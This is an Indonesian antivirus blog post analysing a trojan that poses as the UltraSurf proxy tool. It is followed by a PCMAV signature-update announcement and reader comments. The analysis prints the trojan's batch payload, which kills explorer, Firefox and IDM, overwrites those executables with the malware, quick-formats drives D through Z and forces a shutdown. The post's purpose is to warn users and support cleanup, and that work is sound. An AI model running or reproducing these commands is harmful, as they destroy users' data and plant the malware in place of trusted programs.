Home > Analisa Virus, Antivirus, Pengumuman > UltraSurf: Memformat Semua Hard Disk

UltraSurf: Memformat Semua Hard Disk

UltraSurf

UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.

A. Info File
Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm

B. About Malware
UltraSurf
Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.

Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.

UltraSurf

C. Companion/File yang dibuat
UltraSurf
Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”.  Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.

D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe

taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe

mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe

xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Internet Download Manager\IDMan.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\Program Files\Mozilla Firefox\firefox.exe"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer"
xcopy ultrasurf.exe /h /r /c /y "C:\windows\explorer.exe"

Memformat semua hard disk mulai dari drive D sampai Z.

echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y

Dan yang terakhir adalah melakukan proses shuting down

start shutdown.exe -f -t 0 –s

Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.

E. Pembersihan
UltraSurf

PCMAV 5.4 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 5.4 Update Build1:

Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat

Categories: Analisa Virus, Antivirus, Pengumuman Tags:
  1. yoyo
    August 16th, 2011 at 12:33 | #1

    pertamax kah

  2. Zenoeva
    August 16th, 2011 at 14:04 | #2

    Makasih Infony kl ga data saya habis..

  3. efka
    August 16th, 2011 at 15:44 | #3

    seyem oi..
    mudah2an ga sampe ada yang bunuh diri gara2 hardisknya ke format…

  4. yadeee
    August 17th, 2011 at 17:17 | #4

    wah bener-bener parah nih yang buat virus, bener apa yang dikata efka “mudah2an ga sampe ada yang bunuh diri gara2 hardisknya ke format…”

  5. バデラ
    August 17th, 2011 at 21:17 | #5

    makanya jangan tertipu dengan memakai aplikasi yang tidak jelas terutama melihat di blog blog yang kurang dipercaya~ oWo

    ini adalah cara kejam, memformat harddisk :/

    harddisk yang terformat, itu susah kalau direcover, kalau bisa direcover butuh waktu yang banyak DX

    anyway, ukurannya random, ini sekitar berapa KB? (maksudnya kebanyakan berapa KB?)

  6. mang_user
    August 18th, 2011 at 02:33 | #6

    Klasik banget, bikin kayak batch ginian !!! binering planting ??! Clean to OS pirates….Sedeppp 😀 |[prepair to medium destroys]101010

  7. alpha
    August 18th, 2011 at 02:52 | #7

    simply but deadly.

  8. prayitno
    August 18th, 2011 at 06:49 | #8

    LeBaY….!!! hardisk ke-Format kudu pake acara bunuh diri….. yg ada juga bunuh itu virus dari Komputer !!! and Kasih tau yg laen biar ng’gak kejebak hal yg sama…. ^^,d (soalnya ane sendiri yg dapet ney musibah and dapet ney virus, juga dari link yg ada di Forum) Terimakasih untuk Administrator diForum yg dah respon dengan cepat dan ng’Blok link yg ada, jadi tidak menyebar dan digunakan oleh penghuni Forum yg laen….

  9. gemblung
    August 18th, 2011 at 09:17 | #9

    Tenaaaang. Suatu saat si pembuat virus di atas akan dapat balasannya. Data2 pentingnya insya Allah akan hilang…tinggal masalah waktu…

  10. August 19th, 2011 at 18:49 | #10

    hanya batch script doank, dongo banget kalo sampe bisa ketipu 😀 :)) huahahaha…

  11. バデラ
    August 19th, 2011 at 22:44 | #11

    @prayitno: sama aja kalee kalau data penting itu sangat penting, ya sama aja dan percuma menghapus virusnya … :p dan KID jangan sombong :p

  12. A.RAHMAN
    August 20th, 2011 at 10:09 | #12

    pcmav 5.4 masih blum sempurna,
    2 hari yg lalu di kantor teman sy mengganti AV pakai pcmav, karena di readme textnya, katanya udah fixed untuk file doc.office. ternyata saat pcmav di aktifkan data pimpinan kami yg di simpan di flash disk tidak bisa terbuka sampai-sampai orang dikantor panik, pgawai sbuk membuat filenya kembali, tapi kemarin setelah sy lht PC kantor dan sy exit pcmav datanya baru bisa terbuka.. mohon tim pcmav berkenan merevisi edisi 5.4 dan membuatkan LINK di Website ini… karena kami adalh pelanggan majalah PC media d Kota Palu. karena ini sangat merugikan!

  13. sulore
    August 20th, 2011 at 23:28 | #13

    @A.RAHMAN
    fitur block program on usb jangan dicentang.

  14. prayitno
    August 22nd, 2011 at 06:16 | #14

    “hanya batch script doank” itu karena “lw” liat penjelasan dari team PCMAV, aslinya file ini executable dan orang ng’gak akan menyangka kalo isinya bukan command batch script… padahal isinya seperti yg terlihat pada penjelasan diatas…

  15. prayitno
    August 22nd, 2011 at 06:20 | #15

    ng’bunuh virus mah kagak ada percumanya neng…. malah harus dan wajib, tapi kalo bisa ya…. upload dulu ke : http://upload.virusindonesia.com/ biar database PCMAV makin komplet dan ampuh… ^^,d

  16. A.RAHMAN
    August 22nd, 2011 at 10:16 | #16

    sudah bung, sy sudah coba sarannya tapi tetap sj datanya tidak bisa terbuka

  17. August 22nd, 2011 at 20:54 | #17

    semakin hari virus semakin ganas aja, harus update pcmav terus nih

  18. exalute
    August 25th, 2011 at 18:14 | #18

    kayaknya ini pekerjaan phreaker yang suka pake trik gratisan ^^
    hahahayyy ada nama mindhack wow

  19. Ahyau
    August 25th, 2011 at 21:46 | #19

    wew.. nama Mindhack dibawa2 wew..

  20. August 27th, 2011 at 02:13 | #20

    bahaya juga nih buat yang suka berburu gratisan

  21. Neo
    August 28th, 2011 at 03:22 | #21

    Amat sangat simple tetapi sangat merugikan,,,, ini pelajaran tuk kita semua agar tidak mengeksekusi file2 exe sembarangan,, mungkin sekarang dia bikin dgn nama software ultrasurf bisa jadi besok2 si pembuat virus membuat virus dgn nama software beken lain nya,,, waspadalah,, waspadalah,,,

  22. InTruder
    August 28th, 2011 at 12:11 | #22

    Makanya download langsung dari official websitenya

  23. yooke
    August 29th, 2011 at 12:01 | #23

    sudah update pcmav – buat jaga2
    pegang 2 komputer, win xp dan win 7
    selain itu plugin clamav juga ikut di update
    kenapa yah beberapa aplikasi di win xp gak mau jalan kalo pcmav aktif di win xp? yang cukup parah ngambek adalah ‘Mobile Partner’ buat modem USB 🙁
    xp sp 3 yang saya gunakan

  24. sulore
    August 30th, 2011 at 22:31 | #24

    @yooke
    coba liat jawabannya di _http://virusindonesia.com/forum/viewtopic.php?pid=14214#p14214

  25. barubie
    September 1st, 2011 at 00:29 | #25

    saya pake pcmav 5.3, gimana caranya update keyang baru..saya coba dari traynya tetapi salau muncul no update found,gimana ni mas mas, tolongin dong

  26. Ferry Wibisana
    September 1st, 2011 at 08:27 | #26

    saya sudah download PCMAV 5.4 Valhalla dan update-nya, tapi kenapa setiap saya jalankan di komputer saya, komputer saya jadi sering nge-hang.
    Padahal sebelumnya saya pake yang 5.0 – 5.3 ga apa-apa, malah bagus.
    Apa ada yang salah pd komputer saya, ato gmn nih ?
    Saya jadi pake versi yang 5.3 aja sekarang…..

    Tolong dong kasih penjelasan knp bisa begini ???

  27. Indra
    September 1st, 2011 at 11:37 | #27

    @Ferry Wibisana: silahkan buka _virusindonesia.com/forum/viewtopic.php?id=1078_

  28. September 6th, 2011 at 20:08 | #28

    valueable information

  29. jangan mau di kibulin
    September 11th, 2011 at 15:33 | #29

    Jiah mau2 aja di kibulin..

  30. September 12th, 2011 at 21:42 | #30

    mantap gan artikelnya. sangat membantu sekali buat para newbie kayak gini, terima kasih.